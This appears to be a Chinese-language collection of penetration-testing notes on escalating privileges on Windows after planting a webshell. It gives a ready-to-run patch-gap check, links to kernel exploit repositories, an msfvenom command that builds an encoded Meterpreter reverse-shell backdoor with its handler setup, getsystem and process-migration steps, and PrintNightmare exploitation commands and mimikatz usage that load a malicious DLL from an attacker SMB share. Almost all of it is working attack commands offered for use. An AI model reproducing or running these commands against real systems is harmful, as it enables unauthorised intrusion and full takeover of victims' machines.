payload

1.利用exp提权

再用一句话木马连接到目标服务器之后，可以直接在命令行输入：

快速查找未安装的补丁cmd指令：

systeminfo > micropoor.txt&(for %i in ( KB977165 KB2160329 KB2503665 KB2592799 KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904 KB3134228 KB3143141 KB3141780 ) do @type micropoor.txt|@find /i "%i"|| @echo %i you can fuck)&del /f /q /a micropoor.txt

他会快速查找未打补丁的 exp，然后在网上找一下利用过程或者直接找利用程序

已对外公开exp注：
https://github.com/SecWiki/windows-kernel-exploits
https://github.com/WindowsExploits/Exploits
https://github.com/AusJock/Privilege-Escalation

exp有直接的exe运行程序的话就可以把这个exe程序丢到目标机上，让目标机运行

2.sc命令提权（比较鸡肋）

sc Create syscmd binPath= "cmd /K start" type= own type= interact

3.kali提权

（1）先用nsfvenom生成一个exe的后门,上传到目标主机上

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.168.88.132 LPORT=4444 -f exe > abc.exe

(2)进入msf,执行命令

msfconsole

(3)输入 use exploit/multi/handler

(4)输入 set payload windows/meterpreter/reverse_tcp

(5)输入 set lhost 192.168.88.132

(6)输入 set lport 4444

(7)输入 run ,并在目标主机上运行abc.exe

(8)如果在msf的界面上出现了meterpreter>的界面，则成功了

（这里可以先尝试执行sysinfo命令查看系统补丁情况，匹配未修复的内核溢出漏洞

上传对应漏洞的 EXP（漏洞利用工具），在低权限 cmd 中直接执行

执行完成后，直接弹出 SYSTEM 权限的命令行，一步完成提权）

（9）输入shell可以进入到目标主机终端，whoami查看权限

如果发现权限太低（这里好像可以直接在meterpreter>输入getuid # 查看权限），提权如下：

法一：exit先退回到meterpreter>界面，输入getsystem再输入shell就可以了法二：迁移进程：，原理是通过该指令将他的权限移植到我们自己这里来。
(1)首先使用ps查看哪些进程被较高用户权限开启的进程
比如下面的336(PID)，是system开启的，我们就可以尝试将他的权限移植给我们
(2)migrate 进程PID   #即migrate 336
如果出现Migration completed successfully就代表成功移植了

推荐享用技术文章：提权 | Windows系统 - 竹等寒 - 博客园

https://mp.weixin.qq.com/s/WRY5xRwhcL_hVGvaeSHOJg

四、内核逻辑漏洞提权（有时间就搞一下）

核心原理：这类漏洞不依赖内存溢出，而是内核本身的权限校验逻辑存在缺陷 —— 比如 Windows 的进程令牌管理、对象管理、系统服务机制中，没有严格校验调用者的权限，低权限用户可以构造特殊的系统调用，欺骗内核给自己的进程分配高权限令牌，直接完成提权。

真实利用场景：

最具代表性的就是PrintNightmare（噩梦打印）漏洞（CVE-2021-34527），漏洞存在于 Windows 自带的 Print Spooler 打印服务中。绝大多数企业服务器、办公电脑都会默认开启该服务，黑客只需拿到普通用户权限，一键执行 EXP，就能直接提权到 SYSTEM，甚至可以横向渗透域控制器。

漏洞利用

利用工具

python版本的 https://github.com/cube0x0/CVE-2021-1675
C#版： https://github.com/cube0x0/CVE-2021-1675/tree/main/SharpPrintNightmare
C++版本的 https://github.com/afwu/PrintNightmare
本地提权版： https://github.com/hlldz/CVE-2021-1675-LPE
mimikatz: 2.2.0 20210709 Printnightmare rewrited

漏洞过程

1. 首先搭建一个SMB匿名共享，放恶意dll文件。
2. 工具运行后会先检测C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_xx文件名，自动替换。
3. 然后远程拉取我们设置的匿名共享的恶意dll文件执行

4.可以使用rpcdump.py来扫描潜在的易受攻击的主机，如果它返回一个值，它可能是易受攻击的
协议：[MS-RPRN]：打印系统远程协议

kali
impacket-rpcdump  @192.168.0.1 | grep MS-RPRNwindows
python3 rpcdump.py @192.168.0.1 | findstr MS-RPRN

然后进行利用，这里使用 dll 是 cs 生成的 dll

windows
python3 CVE-2021-1675.py djhons.com/test:Admin@123@192.168.0.1 "\\192.168.0.2\smb\shell.dll"kali
python3 CVE-2021-1675.py djhons.com/test:Admin@123@192.168.0.1 '\\192.168.0.2\smb\shell.dll'

mimikatz

mimikatz.exe
misc::printnightmare /server:192.168.0.1 /authuser:localuser /authpassword:pass /library:\\192.168.0.2\smb\shell.dll /nodynamic